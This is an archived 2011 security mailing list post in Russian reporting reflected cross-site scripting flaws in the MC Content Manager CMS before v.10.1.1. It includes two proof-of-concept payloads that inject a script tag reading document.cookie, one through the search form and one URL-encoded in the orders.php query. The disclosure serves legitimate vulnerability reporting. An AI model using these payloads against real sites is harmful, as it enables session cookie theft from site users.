Related information

Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

[DCA-2011-0002]: TOTVS ERP Microsiga Protheus - Users Enumeration

[DCA-2011-0003]: LMS Web Ensino - Multiple XSS, Session Fixation, CSRF and SQL Injection

'Quick Polls' Local File Inclusion & Deletion Vulnerabilities (CVE-2011- 1099)

XSS in CubeCart <= 2.0.7

From:	MustLive <mustlive_(at)_websecurity.com.ua>
Date:	09.03.2011
Subject:	Cross-Site Scripting уязвимости в MC Content Manager

Здравствуйте 3APA3A!

Сообщаю вам о найденных мною Cross-Site Scripting
уязвимостях в системе MC Content Manager. Это
украинская коммерческая CMS.

XSS (WASC-08):

POST запрос на странице http://site/ru/cms/search

"><script>alert(document.cookie)</script>
В поле поиска.

XSS (WASC-08):

http://site/orders.
php?act=search&query=%22%3E%3Cscript%3Ealert(document.
cookie)%3C/script%3E

Уязвимы предыдущие версии MC Content Manager (до
версии v.10.1.1).

Дополнительная информация о данных уязвимостях у меня
на сайте:
http://websecurity.com.ua/4674/

Best wishes & regards,
MustLive
Администратор сайта
http://websecurity.com.ua